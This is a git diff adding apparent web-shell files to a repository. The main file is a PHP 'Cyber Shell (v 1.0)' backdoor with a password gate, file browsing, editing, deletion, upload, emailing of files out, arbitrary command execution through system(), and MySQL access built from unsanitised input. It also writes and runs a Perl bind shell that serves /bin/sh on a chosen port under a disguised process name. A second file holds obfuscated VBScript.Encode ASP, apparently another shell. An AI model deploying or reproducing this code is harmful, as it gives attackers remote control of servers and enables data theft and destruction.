0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDrLnXbbSoILeLwJe6uyW8Baa0tWkDl4wxyQhAI4yCc/MDzzjITx9q+n3Go3VloUmjwRtbqbDUYHUsZBJh1XIwB5DcgDO85ztGNBtRjkaykiu9FdIFV4zJrcttIC1qsLhlSJsEc4YNuHYjJB5nXI0g0V1N/p0xLWsMMVrfG5ZUj+1MSSYowqjzlVVAwAoHHFXzQ5Lcvvd/L+vX16A91Y//Z',
+);
+@ob_clean();
+header("Content-type: image/gif");
+header("Cache-control: public");
+header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+header("Cache-control: max-age=".(60*60*24*7));
+header("Last-Modified: ".date("r",filemtime(__FILE__)));
+echo base64_decode($img[$imgname]);
+die;
+}
+
+if ($_GET[pass]==$aupassword)
+{
+$_SESSION[aupass]=md5($aupassword);
+}
+if ($hiddenmode=="false")
+if ((!isset($_GET[pass]) or ($_GET[pass]!=$aupassword)) and ($_SESSION[aupass]==""))
+{
+$diz="ok";
+echo "
+$style















    
+
    
+
+
+
+
+
+
+
+
+
+
+
    
+Enter your password:
+
    
+
+
    
+
+
    
+
    
+";
+}
+if ($_SESSION[aupass]!="")
+{
+if (!$_GET and !$_POST or isset($pass)) 
+$show="start";
+
+function ext($str){
+for ($i=1; $i",">",$str);
+return $str;
+}
+function fsize($filename){
+$s=filesize($filename);
+if ($s>1048576){
+return round(($s/1048576),2)." mb";
+}
+if ($s>1024){
+return round(($s/1024),2)." kb";
+}
+return $s." byte";
+}
+function tourl($str){
+$str= urlencode($str);
+return $str;
+}
+function unbug($str){
+$str = stripslashes($str);
+return $str;
+}
+function countbyte($filesize) {
+if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+else { $filesize = $filesize . ""; }
+return $filesize;
+}
+function downloadfile($file) {
+if (!file_exists("$file")) die;
+$size = filesize("$file");
+$filen=extractfilename($file);
+header("Content-Type: application/force-download; name=\"$filen\"");
+header("Content-Transfer-Encoding: binary");
+header("Content-Length: $size");
+header("Content-Disposition: attachment; filename=\"$filen\"");
+header("Expires: 0");
+header("Cache-Control: no-cache, must-revalidate");
+header("Pragma: no-cache");
+readfile("$file");
+die;
+}
+
+function anonim_mail($from,$to,$subject,$text,$file){
+ $fp = fopen($file, "rb");
+ while(!feof($fp))
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "sendfile  (".extractfilename($file).")";
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $from\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+  $info  = $text;
+  $filename=extractfilename($file);
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filename \nContent-disposition: inline; filename=$filename \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+  $send = mail($to, $subject, $info, $headers);
+fclose($fp);
+echo "";
+die;
+}
+if (!empty($_GET[downloadfile])) downloadfile($_GET[downloadfile]);
+if (!empty($_GET[mailfile])) anonim_mail($email,$email,$_GET[mailfile],'File: '.$_GET[mailfile],$_GET[mailfile]);
+
+$d=$_GET[d];
+if (empty($d) or !isset($d)){
+$d=realpath("./");
+$d=str_replace("\\","/",$d);
+}
+$showdir="";
+$bufdir="";
+$buf = explode("/", $d);
+for ($i=0;$i$d
+
+$style
+
+
+
+    
+    
+    
+    
+    
+  
+
    
+
    $showdir
    
+EOF;
+
+function perms($file) 
+{ 
+$mode=fileperms($file);
+if( $mode & 0x1000 ) 
+$type='p';
+else if( $mode & 0x2000 ) 
+$type='c'; 
+else if( $mode & 0x4000 ) 
+$type='d'; 
+else if( $mode & 0x6000 ) 
+$type='b'; 
+else if( $mode & 0x8000 ) 
+$type='-';
+else if( $mode & 0xA000 ) 
+$type='l'; 
+else if( $mode & 0xC000 ) 
+$type='s'; 
+else 
+$type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function updir($dir){
+if (strlen($dir)>2){
+for ($i=1; $i
+  
    
+Ââåğõ
+    
+Íàçàä
+    
+ íà÷àëî
+    
+Èíñòğóìåíòû
+    
+Ê ñïèñêó
+    
    
+EOF;
+
+$free = countbyte(diskfreespace("./"));
+if (!empty($free)) echo "Äîñòóïíîå äèñêîâîå ïğîñòğàíñòâî : $free
    ";
+$os=exec("uname");
+if (!empty($os)) echo "Ñèñòåìà :".$os."
    ";
+if (!empty($REMOTE_ADDR)) echo "Âàø IP: $REMOTE_ADDR   $HTTP_X_FORWARDED_FOR
    ";
+$ghz=exec("cat /proc/cpuinfo | grep GHz");
+if (!empty($ghz)) echo "Èíôà î æåëåçå:(GHz)".$ghz."
    ";
+$mhz=exec("cat /proc/cpuinfo | grep MHz");
+if (!empty($mhz)) echo "Èíôà î æåëåçå:(MHz) ".$mhz."
    ";
+$my_id=exec("id");
+if (!empty($my_id)) echo "
    Ïîëüçîâàòåëü:".$my_id."
    ";
+}
+
+function showdir($df) {
+$df=str_replace("//","/",$df);
+$dirs=array();
+$files=array();
+if ($dir=opendir($df)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$df/$file")){
+$dirs[]=$file;}
+else {
+$files[]=$file;}}}
+closedir($dir);
+sort($dirs);
+sort($files);
+echo <<< EOF
+
+EOF;
+for ($i=0; $i
+    
+    
+    
+    
+    
+  
+EOF;
+}
+for ($i=0; $i
+    
+    
+    
+    
+    
+  
+EOF;
+}
+echo "
    $dirs[$i]Óäàëèòü
    Êàòàëîã
    		$perm
    $files[$i]  ($fsize)ren/del/get/mail
    $attr
    		$perm
    ";
+if (count($dirs)==0 && count($files)==0){
+echo <<< EOF
+
+  
+    
+  
+
    Ïàïêà ïóñòà
    
+EOF;
+}}
+
+$edit=$_REQUEST[edit];
+if (isset($_REQUEST[edit]) && (!empty($_REQUEST[edit])) && (!isset($_REQUEST[ashtml])) ){
+$file=fopen($edit,"r") or die ("Íåò äîñòóïà ê ôàéëó $edit");
+if (filesize($edit) > 0)
+$tfile=fread($file,filesize($edit)) or die ("Íåò äîñòóïà ê ôàéëó $edit");
+else $tfile = "";
+fclose($file);
+$tfile = htmlspecialchars($tfile,ENT_QUOTES);
+echo "
+
    
+
    ";
+$mydir=updir($edit);
+echo "
+Âåğíóòüñÿ ê $mydir/
    
+Âû ğåäàêòèğóåòå ôàéë : $edit
    
+Ïğîñìîòğåòü ıòîò ôàéë â âèäå HTML
+
    
+
+
    
+";
+if (!isset($_REQUEST[readonly]))
+echo "";
+echo "
+
    
+
    
+
    
+";
+}
+if (isset($edit) && (!empty($edit)) && (isset($ashtml))){
+$mydir=updir($edit);
+echo "
+
    
+Âåğíóòüñÿ ê $mydir/
    
+Âû ïğîñìàòğèâàåòå ôàéë : $edit
+
    
+";
+readfile($edit);
+echo "
+
    
+
    
+";
+}
+
+if (isset($texoffile) && isset($nameoffile))
+{
+$texoffile=unbug($texoffile);
+$f = fopen("$nameoffile", "w") or die ("Íåò äîñòóïà ê ôàéëó $nameoffile");
+fwrite($f, "$texoffile");
+fclose($f);
+$mydir=updir($nameoffile);
+echo "";
+die;
+}
+
+if (isset($_REQUEST[delfile]) && ($_REQUEST[delfile]!=""))
+{
+$delfile=$_REQUEST[delfile];
+$mydir=updir($delfile);
+$deleted = unlink("$delfile");
+echo "";
+die;
+}
+
+function deletedir($directory) {
+if ($dir=opendir($directory)) {
+while (($file=readdir($dir))!==false) {
+if ($file=="." || $file=="..") continue;
+if (is_dir("$directory/$file"))  {
+deletedir($directory."/".$file);} 
+else {unlink($directory."/".$file);}}}
+closedir($dir);
+rmdir("$directory/$file");
+}
+if (isset($_REQUEST[deldir]) && (!empty($_REQUEST[deldir]))){
+$deldir=$_REQUEST[deldir];
+$mydir=updir(updir($deldir));
+deletedir("$deldir");
+echo "";
+die;
+}
+
+if (isset($show)){showdir("$d");}
+
+{
+if (isset($_REQUEST[tools]))
+echo <<< EOF
+
    
+
+
+
+
+
    
+.: Äåéñòâèÿ äëÿ äàííîé ïàïêè :.
+
    
+
    
+EOF;
+if (isset($_REQUEST[tools]) or isset($_REQUEST[tmkdir]))
+echo <<< EOF
+
    
+
+
+
+
+
+
+
+
    
+
    
+.: Ñîçäàòü ïàïêó :.
+
    
+
+
+
+
+
    
+
    
+EOF;
+
+if (isset($newdir) && ($newdir!=""))
+{
+$mydir=updir($newdir);
+mkdir($newdir,"7777");
+echo "";
+}
+
+if(@$_GET['rename']){
+echo "RENAME $d/$filetorename ?

    
+
    
+
    
+RENAME
    $filetorename

    TO
    
+

    
+
+
    
+";
+@$rto=$_POST['rto'];
+if($rto){
+$fr1=$d."/".$filetorename;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+rename($fr1,$to1);
+echo "File 
    $filetorename
    Renamed to $rto

    ";
+echo "";}
+echo $copyr;
+exit;
+}
+
+if (isset($tools) or isset($tmkfile))
+echo <<< EOF
+
    
+
+
+
+
+
+
+
+
    
+
    
+.: Ñîçäàòü ôàéë :.
+
    
+
+
+
+
+
    
+
    
+EOF;
+
+if (isset($newfile) && ($newfile!="")){
+$f = fopen("$newfile", "w+");
+fwrite($f, "");
+fclose($f);
+$mydir=updir($newfile);
+echo "";
+}
+
+if (isset($tools) or isset($tbackdoor))
+echo <<< EOF
+
    
+
+
+
+
+
+
+
+
    
+
    
+.: Îòêğûòü ïîğò :.
+
    
+Èìÿ ñêğèïòà:  Ïîğò: 
+
+
+
+
+
    
+
    
+EOF;
+
+if (isset($bfileneme) && ($bfileneme!="") && isset($bport) && ($bport!="")){
+$script="
+#!/usr/bin/perl
+\$port = $bport; 
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+\$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";
+
+$f = fopen("$d/$bfileneme", "w+");
+fwrite($f, $script);
+fclose($f);
+system("perl $d/$bfileneme");
+echo "";
+}
+
+if (isset($tools) or isset($tbash))
+echo <<< EOF
+
    
+
+
+
+
+
+
+
+
    
+
    
+
+.: Âûïîëíèòü êîìàíäó :.
+
    
+
+
+
+
+
+
    
+
    
+EOF;
+
+if (isset($cmd) && ($cmd!="")){
+echo "
    ";
+system($cmd);
+echo "
    ";
+}
+
+if (isset($tools) or isset($tupload)){
+$updir="$d/"; 
+if(empty($go)) {
+echo <<< EOF
+
    
+
+
+
+
+
+
+
+
    
+
    
+.: Çàêà÷àòü ôàéë â òåêóùèé êàòàëîã :.
+
    
+
+
+
+
+
+
+
    
+
    
+EOF;
+}
+else {
+if (is_uploaded_file($userfile)) { 
+$fi = "Çàêà÷åí ôàéë $userfile_name ğàçìåğîì $userfile_size áàéò â äèğåêòîğèş $updir";
+}
+echo "$fi
    Íàçàä ê êàòàëîãó";
+}
+if (is_uploaded_file($userfile)) {
+$dest=$updir.$userfile_name;
+move_uploaded_file($userfile, $dest);
+}}
+
+if ((isset($db_server)) || (isset($db_user)) || (isset($db_pass))  ){
+mysql_connect($db_server, $db_user, $db_pass) or die("íå ìîãó ïîäêëş÷èòüñÿ ê áàçå");
+}
+
+if ((isset($dbname)) and (isset($table)) )
+{
+foreach($_POST as $var => $val)
+if (substr($var,0,7) == 'newpole'){
+if (substr($var,7,strlen($var)) !== ''){
+$indif=substr($var,7,strlen($var));
+echo " $val ";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+if ($xvar == "") 
+$xvar .= $indif;
+else
+$xvar .= ",".$indif;
+if ($xval == "") 
+$xval .= "'$val'";
+else
+$xval .= ",'$val'";
+}}
+
+if ($xvar != ""){
+mysql_query("INSERT INTO $table ($xvar) values ($xval)");
+}
+
+echo "Íàçàä ê ñïèñêó òàáëèö ÁÄ:$dbname";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+$re=mysql_query("select * from $table");
+echo "";
+
+$res=mysql_fetch_array($re);
+echo "";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "";
+}}
+echo "";
+
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+$param="limit $_SESSION[limit]";
+
+$re=mysql_query("select * from $table $param");
+
+while($res=mysql_fetch_array($re)){
+echo "";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if (!$pixidname){
+$pixidname=$var;
+$pixid=$val;
+}
+if ($nvar == 128945432){
+$valtext=untag($val);
+if ($valtext == "") $valtext="=Ïóñòî=";
+
+
+if ($_SESSION[lenth] == "on"){
+if (strlen($valtext)>40){
+$valtext=substr($valtext,0,40);
+$valtext .="...";
+}}
+
+echo "";
+}}
+
+echo "";
+$pixidname='';
+$pixid='';
+}
+
+echo "";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "";
+}}
+echo "";
+
+$re=mysql_query("select * from $table");
+$res=mysql_fetch_array($re);
+echo "";
+if (count($res) > 1)
+foreach($res as $var => $val){
+$nvar=$var;
+if ($nvar !== 0)
+$nvar=$var+128945432;
+if ($nvar == 128945432){
+$var=untag($var);
+echo "";
+}}
+echo "";
+echo "
    $var
    $valtextÓäàëèòü
    $var
    ";
+echo "";
+echo "
+
+
+
+
+
+";
+echo "";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($pixidname)) and (isset($pixid)) and (isset($del))){
+echo "hello";
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+mysql_query("delete from $mtable where $pixidname='$pixid'");
+echo "";
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid)) and (isset($textofmysql))){
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+mysql_query("update $mtable set $var='$textofmysql' where $pixidname=$pixid");
+}
+
+if ((isset($dbname)) and (isset($mtable)) and (isset($var)) and (isset($pixidname)) and (isset($pixid))){
+mysql_select_db($dbname) or die("Íå ìîãó âûáğàòü áàçó äàííûõ");
+$re=mysql_query("select $var from $mtable where $pixidname='$pixid'");
+$res=mysql_fetch_array($re);
+$text=untag($res[$var]);
+
+echo "
+
    
+
+
+
+
+
+
+
+
+
+
    
+
    
+Âåğíóòüñÿ ê ñïèñêó
+";
+}
+
+if (isset($showdb) && empty($showtables)){
+$re=mysql_query("show databases");
+echo "";
+echo "";
+while($res=mysql_fetch_array($re)){
+echo "";
+}
+echo "
    Ñïèñîê äîñòóïíûõ ÁÄ:
    $res[0]
    ";
+}
+if (isset($showtables) and !empty($showtables)){
+
+if (isset($xlimit)){
+$_SESSION[limit]=$xlimit;
+if (isset($xlenth))
+$_SESSION[lenth]=$xlenth;
+else $_SESSION[lenth]="";
+}
+
+echo "Íàçàä ê ñïèñêó ÁÄ";
+$re=mysql_query("SHOW TABLES FROM $showtables");
+echo "";
+echo "";
+while($res=mysql_fetch_array($re)){
+echo "";
+}
+echo "
    $showtables - Ñïèñîê òàáëèö: 
    $res[0]
    ";
+
+if (($_SESSION[lenth]) == "on")
+$ch="checked";
+else
+$ch="";
+
+echo <<< EOF
+
    
+
+
+
+
+îãğàíè÷åíèå íà êîëè÷åñòâî âûâîäèìûõ ïîëåé:
    
+
+
    Âêëş÷èòü îãğàíè÷åíèå íà äëèíó âûâîäèìûõ ïîëåé 
    
+
+EOF;
+if (isset($_SESSION[limit]) and ($_SESSION[limit] !== "0"))
+echo "
    Òåêóùåå îãğàíè÷åíèå: $_SESSION[limit]";
+}
+
+if (isset($tools) or isset($tmysql))
+echo "
+
    
+
+
+
+
+
+
+
+
    
+.: MySQL :.
+
    
+
+
+
+
+
+
+
+ 
+
+
+ 
+ 
+
+
+ 
+ 
+
+
+
+
+
+
    
+Host
+
+
+
    
+Login MySQL
+
+ 
+
    
+Password MySQL
+
+
+
+
    
+Èìÿ ÁÄ (íå îáÿçàòåëüíî)
+
+
+
    
+
+
+
+
    
+
+
    
+
    
+";
+}
+echo <<< EOF
+
    .:Cyber Shell (v 1.0):.
    Copyright © Cyber Lords Community, 2002-2006
    
+
+
+
+EOF;
+
+$d=tourl($d);
+echo "
+
    
+
+.: Ñîçäàòü ïàïêó :.
+.: Ñîçäàòü ôàéë :.
+.: Îòêğûòü ïîğò äëÿ ïîäêëş÷åíèÿ :.
    
+.: Bash :.
+.: Çàêà÷àòü ôàéë :.
+    
+
    
+";
+}
+die;
+?>
diff --git a/php/CyberSpy5.Asp.php.txt b/php/CyberSpy5.Asp.php.txt
new file mode 100644
index 0000000..f7d9aa3
--- /dev/null
+++ b/php/CyberSpy5.Asp.php.txt
@@ -0,0 +1,2 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%#@~^FkQBAA==@#@&rU,2MDWMP"n/!:nPg+aO@#@&?.\DRU^.kaY:kh+6;DP~',{ Z!@#@&@#@&frh,1n/	nw?6@#@&"+/aW	d+c.kD+~E@!/YHs+@*PA}9ePPPUZ]rJJ~b]O~)?AO/6drIl~[&$&~f~i~UZ"rSdAz]OzI]rqO/6drI=~a2&swffi,8,@!&/Oz^+@*J@#@&I/2G	/+ 	MkO+,E@!4G9X,4o1W^GD{!T!Z!T~D+6DxB[!!woT!EP^kU3xv[!TswT!EPCsbx3xv[!TswTZB~7Vbx3{B[T!wsT!EPOGa:lMLk	'!@*E@#@&@#@&`w[lOn;W[+,xPrtOOa)z&ASh ZH8DRqlMDkKDc6DTz/X(+.jaX*c)/agu-kE@#@&@#@&BRORR ORO RO O)UKxkh~`wsWm[;VCk/,?YmDD~ZKNnO ORR OO RO OO RRO O ORORR @#@&Z^C/kPor^+j2sKl[+M@#@&dK!4^km,PwrV/@#@&in.r7lY~sKD:Asn:mxhD#@#@&7hDr\mO+,?;8,ZVCdk{(xbOblsby`#@#@&i7?Y~sbVnd,'PUnD7+Dc/.+mYr8Ln^D`E?1.kaYrUTRfr^DkGxm.HJb@#@&id?Y,oWM:3V:CUhD.,xPU+D7n.R;DlO+68N+^YvE?1Dr2DkxL Gk^YbG	l.HJ*@#@&i2	[PUE8@#@&dK.b\lDnPUE4,/slk/|KnDhr	lO+vb@#@&d7rwPqd6(LnmDcwks/*PK4+	@#@&id7sbVndcI+sG\bV^cb@#@&didj+O~wks+k~',1GO4kxL@#@&d72	[,ko@#@&idkwP&dr(LnmD`oGM:2^n:mxnM#bP:tx@#@&77isGDs3V:CUhD. ]:G\)^Vc*@#@&ddi?OPwW.:AVnhmxnM#P{P1KO4k	o@#@&7d3U9Prs@#@&dAx[~UE4@#@∈4^r1PKMWa+DDX,!+DPoWM:cd&xNa#@#@&dioGDsP{PEJ@#@&idrs,oWM:3s:lUKM. 2XrkYdvS;l/`k(x9+a#*PP4xPwGDsP',oGDs2^+hlUKM. qDn:vS/Ck+`d(	Nn6*b@#@&7Ax9PnMWanDDX@#@∈8^km,9+6lE^O~?!4,j2VGC9`b@#@&7dGkh~(kfCOm~~/&UaEOgls+@#@&di9ksPUnK/$nTkxB~xhW/AU[~,xhWd~~-GlOl~GE	NdS,xfCOmAGE	[hWd@#@&idfb:,UnK/ok^+S~	nWk$W!xN@#@&7d(kGlOl~x,In;!n/DR$r	lDz]l[`"n$EnkYcKWDl^$XD+d#@#@&77	nWk$+Tkx,x~F@#@&idUnGdAx[P{~q	/O.~`xKGkAnobUBP8bfmYlBP;$XD+jYMkULvZtMcF2##*@#@&dikwPcxKGk2UN UnK/$nTkxb~@!'~!,P4+U,2XkY,?!8@#@&d7\GlOC~WE	[/,'Ptr[Av4bfCYCS,xKWk$+TkUS,xnGdAx[O	KK/$obx#@#@&i7xGlOl~W;U9nWk~',qxkO.AvFBP8k9CDlSP79lDl$G!xNdb@#@&7dGG,jUDk^PxGlDCAKEUNhWd~{Pq	dYMA`(r9lDlBP-fCOmAGE	[/,[~/~XYnjDDrxTcrORr#*@#@&idiUnK/~',qUdDDAvUfmYl~G;x9nK/SP8rGlOlB~Z~XOnUYDrUT`EZKUD+UDOGk/aWkrYbWUJ*#@#@&idd	KWkP',(U/DD~`UnGdBP8kGCYm~~/~XYnjDDrxTcrxCs+{J#*@#@&7dixKWkAnLbxP{~xhW/,Q~v@#@&id7xKGk2UN,xP&xdOMA`UKK/$+Tr	~~(kGlYm~,/AHYn?DDrUT`Z4.`2c#*b@#@&idi/(x2;D1C:~',Z	r9+?O.bxL`tr9Ac(kGlYm~,UnK/$+TkUS,xnKd2	NO	KG/~+TkU#b@#@&d7d	KWksrsP'~(	/OD~c	fCDl~WE	NhG/BP8kGlOCBPZ~zY?YMrUovJ6ks+UCs+xJ*b@#@&d77	nWd$KEUN,x,qUkYMA`	nKd2	NSP(k9CDl~,-fmYl~G;x9/*@#@&d77bs~xhG/wksn,@!@*~T,bUN,~	nGksbV+,@!,UnK/$W!x[~:t+	@#@&iddi9r:,W`wsWC[wks+B~/wksngl:n@#@&d7dijY~KjaVWmNwrVPxPg+A~`wVKCNNsbsn@#@&did7xKGkAnobUP{PUKK/srsPQP8T@#@&7idixnK/AUN,'~P&xdOMA`	KWkA+TrU~,4bfCYCS,Z$XDn?DDrUT`Z4.v&*#*b@#@&7idi/sbVHls+~',Z	r9+?D.k	o`tr[Av4bfCYCS,xKWk$+TkUS,xnGdAx[O	KK/$obx#*@#@&7didGjaVGC9sk^nRwkVHC:P{P]kL4D`dsbs+glhnBPSnUv/ok^nglh# qxUYM]+7`dsbVnHm:+B~J'J#*@#@&didixKWd~{P(xkOD~`UKK/2U[BP8kGCDlS,Z~XY?D.k	ocJ;WUOxY PXa+)rbb@#@&did7xKGkAnobUP{PUKK/PQ~8c@#@&i7idUhWk2x9P{~q	/OD~`UKK/ALk	~P(r9lDlBP/AzO?ODbUovZ4.vF&bb*@#@&di7iWiaVKlNwk^nR;WUYxOPHw+,xP;k9njYMk	ocHr[~`8kGCYm~~UhW/$nTkU~,UhWdAx9OxhWk$+TkU#*@#@&7idd	KWkA+TrUP{P	nG/3U9_*@#@&7didUKK/2U[,'~q	dDD$vxhW/~+TrxBP8kGlOCBP\GCYmAW!U[/*P P+@#@&7id7W`2VKl[obV+ obVnfmOmPx,HbNAv4b9lDlSP	nGd~+obU~,xnKd3x9O	nG/$nTkU#@#@&did7rwPWi2^WCNwr^+ wk^+?by~@*,!~K4+U~wkVdRzNN,J/lk+v/(x2;D1C:b~,Wi2^Wl[obVn@#@&7id3^/@#@&idi7xhWdP{P(UkYD~cxhW/B~8kGlDlSP/$HYn?D.k	oc/4D`qf*#b@#@&7id7	nK/AobUP{PUnK/~Q,c@#@&7didxhGd2	N,'~qUdDD$`	KWkAnLbx~~8bfCYmS,\9mYmAW!x9d#,O~ @#@&77idkw~1KYPwG.:AV:CxK.jR36bdYk`J/m/+cd&x2EDHm:n*#,Ktx,oWM:3V:CUhD.c)N9PS;Cd+v/&x2EOHm:n#B~Zqk[nUYDrUT`\k9$v4rGlDl~,xhG/~+Lk	~~UhW/AUN xnKd$+Tk	#b@#@&7id3x9~kw@#@&7idx9CDl$W!U9nGkP{Pq	/D.Avx9lDl$G!xNhG/,_PdnUAv\GlOl$G!x[/*SP(k9CDl~~-GlOl~G!x[k#@#@&diSKGw@#@&72	N~j!4@#@&7nMk\mOnPwE	mOkGU,Z$XDn?DDrUT`/jOMkUo*@#@&d7GksPAHYrx9+a@#@&d7oKDP~zYkx9naP{P8POW~Jxc/UODbxLb@#@&d7~,P/AHO?OMk	oP{P;$XD+jYMkUL,[P;4D~`bk^$`tk9`d?O.bxL~~zYkU[6~qb*#@#@&i7g+aD@#@&d2	N,oE	mOkKx@#@&inDb-lD+Pw;UmDkKx~Z	r9+jYMrxT`8dUYDrUT#@#@&i7Gkh,AHY+bx9n6@#@&7d;r[?YMrxTP'rE@#@&idwW.P$zD+rx9n6,'~q,YW~Jx$`(dUY.bxT#@#@&di~P,Z	k9+jOMkxT~',Zb[n?DDbxLP'~;t.`zdm~`\r9A`8dUY.k	LBAzD+bxN6Bq#*#~@#@&d7H6Y@#@&dAxN,o;x1YbWU@#@&3	N~Z^C/k@#@&/^l/d~`wsWm[NobV@#@&in!8Vbm~ZKxOn	YKH2+@#@&dh;8Vbm,srVnHm:n@#@&7n!4sr1PsrsfCYm@#@&dK!4^km,nMGwDOX,MnO,sk^n?by+vb@#@&idwks+jr.+~',J+	AcobV+9CDlb@#@&7Ax[,nMWwDDz@#@&dKE(Vr^,?E(~?m\+:G9kk3v/KlO4*@#@&di9ksPGoU~PGobVn@#@&7ifrsP~XYk	[+X@#@&diko~knlD4P{PJr~6D,sbVn1ChPxPrEP:tnU,26rO,?;4@#@&idrwPtkNv/hCY4~~SxcdhlY4b#,@!@*,EwJ,K4+UPdKmY4P{~/hlO4,[PEwr@#@&dijY~KsUP',?.\D ZM+COr4NnmD`JU^.kaYbxLRor^+jXkO+sr8%mYEb@#@&7dbo,1GDPKs?csKsND36b/Odv/nmOt*PK4nUPA6bY~?;8@#@&7dUnY,Wor^+Px~KsjR;.lOK6Ywk^n`knCY4P'~wkVHls+~,P.E#@#@&7doGMP$XDnk	Nna,'Pq~DW~SU~`obVflDl*@#@&id~P,PGobV+c	DbY+,/4Dvbkm$`\r9Acsbs+GlOCBAXOnbx[+XS8#b*@#@&ddg+XO@#@&d7WwksncZVKd+@#@&dAU[PUE(@#@&dK;(Vrm,jE(PjC7+KG9mYC4md`$HI0PKsbnV9#@#@&idro,S+	$`wkV9CYm#,'~!~P4+UPAakDPj;(@#@&77bs~qk6(Ln1YvWsb+^[#,K4+	@#@&7idWwr+^NRz22+	N;t;xV~wks+GCYm@#@&7i2x[~bs@#@&i3	N~UE(@#@&Ax9~Z^ld/@#@&@#@&wEx1OkKxPGn/DHwD?ODrUT`dYM/DHwOjDDkUL*@#@&dGrsPdDD"bBPm.C6/tmDjnD~PbSPbxYnnz~,k	Y60WjYSPkOD"lAFX~~dDDu+X/MX2GlDl@#@&d,~P,/OD"lAFXP{~IbotDcdYMZMX2YjOMkUoB~SxcdDDZ.zaYjYMr	ob,O,qxUYMc/DD/DHwOjDDk	L~,Jurbb@#@&d,P~PrUDrW0UnY,'~]botOckY.ImAn+zBPd+xv/D.ImhF+H#~R,qxUODv/YM]Chn+H~EuEb*@#@&d,~P,kUOn+X~x,Cn6;G	\cd+6Y`kYM]lS|nXBP(UUYDvdYMIlSFnXBPruE#~R,Fb#,RP_+a/Kx\cr	Y606jYb@#@&iPP,PkOD_+aZMX29mYl,xPd+0DcdYMZMX2YjOMkUoB~SxcdDDZ.zaYjYMr	ob,O,`SxvdYMIChn+zb,_P8b#@#@&d,~~PmD_+aZ4CM?nY,xPUwsrD`/O._+aZMzafCDlBPC6vrxD|nX*#@#@&idPwGD,k'Z~OW,j~W;x[cmDu+X/tmDjnD#@#@&7iP~P,~,/OMIzP{PkOD"b	PLP/4M`CaZKx\vC.C6;tCDjnD`r#*&k	YFnH#@#@&7iPH+XO@#@&7,P,PfZMzwD?ODbxL~{PZUODv/YM])*@#@&2UN~o!x^YbGx@#@&@#@&@#@&s;U1YrW	~_+a;W	